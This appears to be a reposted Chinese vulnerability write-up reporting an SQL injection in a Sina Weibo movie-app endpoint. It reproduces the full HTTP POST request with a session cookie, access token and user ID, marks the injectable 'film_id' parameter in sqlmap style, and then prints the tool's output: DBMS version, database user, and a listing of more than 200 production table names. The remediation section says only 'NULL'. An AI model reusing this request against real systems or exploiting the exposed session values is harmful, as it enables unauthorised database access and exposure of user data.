新浪微博另一处SQL注入漏洞
程序员文章站
2022-07-08 14:22:04
滴,穴深卡。周芷若已哭晕在厕所。
POST https://ting.weibo.com/movieapp/dialogue/show HTTP/1.1
Host: t...
滴,穴深卡。周芷若已哭晕在厕所。
POST https://ting.weibo.com/movieapp/dialogue/show HTTP/1.1 Host: ting.weibo.com Accept: application/json Content-Type: application/x-www-form-urlencoded Connection: keep-alive Proxy-Connection: keep-alive Cookie: TING-G0-YF=61cb3ab25b54439455665d34a539fe7d; ua=01ApXxYxOf5lUqITxkskwioISGPlqMsCLL9GcfVT8tIX1QLeA.__iPhone 6__os9.3.1__1.4.0 User-Agent: WeiboMovie/1.4.0 (iPhone; iOS 9.3.1; Scale/2.00) Accept-Language: zh-Hans-US;q=1, en-US;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 231 action=dialogue%2Fshow&aid=01ApXxYxOf5lUqITxkskwioISGPlqMsCLL9GcfVT8tIX1QLeA.&d_n=iPhone%206&film_id=178868*&from=8614093010&ip=100.77.76.179&os_n=iOS&os_v=9.3.1&token=2.00ddC5ZDcX6kGDfeab6c3adc0VbshD&uid=3271300273&v=1.4.0&wm=44995
参数film_id
back-end DBMS: MySQL 5
current user: '[email protected]%'
current database: 'musiclib'
back-end DBMS: MySQL 5 Database: musiclib [207 tables] +---------------------------------------+ | artist_match_name | | cinema_area | | cinema_baseinfo | | cinema_screenings | | cinema_tag | | cinema_tag_mapcheck | | firehose_info | | mingxing_activity | | mingxing_userflower | | movie_action_count_score | | movie_admin_page | | movie_answers | | movie_app_ad | | movie_app_push_task | | movie_app_realtime_push | | movie_app_user | | movie_app_user_token | | movie_article | | movie_artist | | movie_box_office | | movie_box_office_poll | | movie_convert_callback | | movie_coupon | | movie_coupon_backup | | movie_customize | | movie_dialogue | | movie_dialogue_pic | | movie_dictionary | | movie_emotion | | movie_event_schedule | | movie_film | | movie_film_old | | movie_film_promote | | movie_filmtopic | | movie_focus | | movie_foreign_comment | | movie_friendfeed | | movie_game_rank | | movie_game_seek_reply | | movie_game_tools | | movie_gewala_buy | | movie_group_comment_report | | movie_group_user | | movie_hashdata | | movie_hottopic | | movie_nativebanner | | movie_newsinfo | | movie_object_relation | | movie_pagepoll | | movie_photo | | movie_place_sale | | movie_poll_daily_detail | | movie_poll_detail | | movie_poll_detail_hot | | movie_poll_manul | | movie_proterty | | movie_push_map | | movie_question_type | | movie_questions | | movie_relation | | movie_relation_page | | movie_tag_map | | movie_ticket | | movie_user_still | | movie_video | | movieapp_photo | | open_api_info | | open_api_tree | | open_group | | open_group_api_map | | open_user | | raw_album | | raw_cinema_mapcheck | | raw_map_check | | raw_map_musician | | raw_movie | | raw_movie_artist_map | | raw_movie_douban_pic | | raw_movie_map | | raw_mv | | raw_mv_recommend | | raw_podcast | | raw_podcast_column | | raw_podcast_map | | raw_podcast_program | | raw_singer | | raw_song | | raw_song_0 | | raw_song_1 | | raw_song_10 | | raw_song_11 | | raw_song_12 | | raw_song_13 | | raw_song_14 | | raw_song_15 | | raw_song_16 | | raw_song_17 | | raw_song_18 | | raw_song_19 | | raw_song_2 | | raw_song_20 | | raw_song_21 | | raw_song_22 | | raw_song_23 | | raw_song_3 | | raw_song_4 | | raw_song_5 | | raw_song_6 | | raw_song_7 | | raw_song_8 | | raw_song_9 | | raw_song_match | | raw_source | | res_ad | | res_album | | res_album_song_map | | res_artist | | res_artist_album_map | | res_artist_song_map | | res_asiapoll_blacklist | | res_band | | res_card_info | | res_celebrity_songlist | | res_chinasong_manul | | res_comm_item | | res_common_banner | | res_copyright | | res_copyright_album_map | | res_copyright_artist_map | | res_copyright_song_map | | res_country | | res_coupon_a | | res_famous_songlist | | res_feedback | | res_film_bonus | | res_film_coupon | | res_focus | | res_friendfeed | | res_hashdata | | res_hotweibo | | res_hotweibo_new | | res_interface_test | | res_keyword_queue | | res_language | | res_language_album_map | | res_language_artist_map | | res_language_song_map | | res_log | | res_lyric | | res_merge_log | | res_music_style | | res_musician_group | | res_musician_page | | res_musicstyle_album_map | | res_musicstyle_artist_map | | res_musicstyle_song_map | | res_musictopic | | res_nativebanner | | res_object_creator_mblog | | res_page_layout | | res_page_render_map | | res_page_rule_set | | res_pagepoll | | res_party_song | | res_party_user_action | | res_party_user_video | | res_relation_store | | res_reservation | | res_right_card_map | | res_right_card_model | | res_s3_log | | res_search_watch | | res_share_text_map | | res_song | | res_song_audio | | res_song_countinfo | | res_song_ext | | res_song_outter_00 | | res_song_outter_01 | | res_song_outter_02 | | res_song_outter_03 | | res_song_outter_04 | | res_song_outter_05 | | res_song_outter_06 | | res_song_outter_07 | | res_song_outter_08 | | res_song_outter_09 | | res_song_outter_0a | | res_song_outter_0b | | res_song_outter_0c | | res_song_outter_0d | | res_song_outter_0e | | res_song_outter_0f | | res_song_ringtone | | res_songautopush_event | | res_square_point_uid | | res_timing_job | | res_topic_monitor | | res_uidlist | | res_update_film | | res_update_song | | res_user | | res_user_rate | | res_usergroup | | song_match_name | | song_mv_map | | xunlongjue_message | +---------------------------------------+ Database: information_schema [37 tables] +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | ENGINES | | EVENTS | | FILES | | GLOBAL_STATUS | | GLOBAL_VARIABLES | | INNODB_CMP | | INNODB_CMPMEM | | INNODB_CMPMEM_RESET | | INNODB_CMP_RESET | | INNODB_LOCKS | | INNODB_LOCK_WAITS | | INNODB_TRX | | KEY_COLUMN_USAGE | | PARAMETERS | | PARTITIONS | | PLUGINS | | PROCESSLIST | | PROFILING | | REFERENTIAL_CONSTRAINTS | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | SESSION_STATUS | | SESSION_VARIABLES | | STATISTICS | | TABLES | | TABLESPACES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | +---------------------------------------+
解决方案:
NULL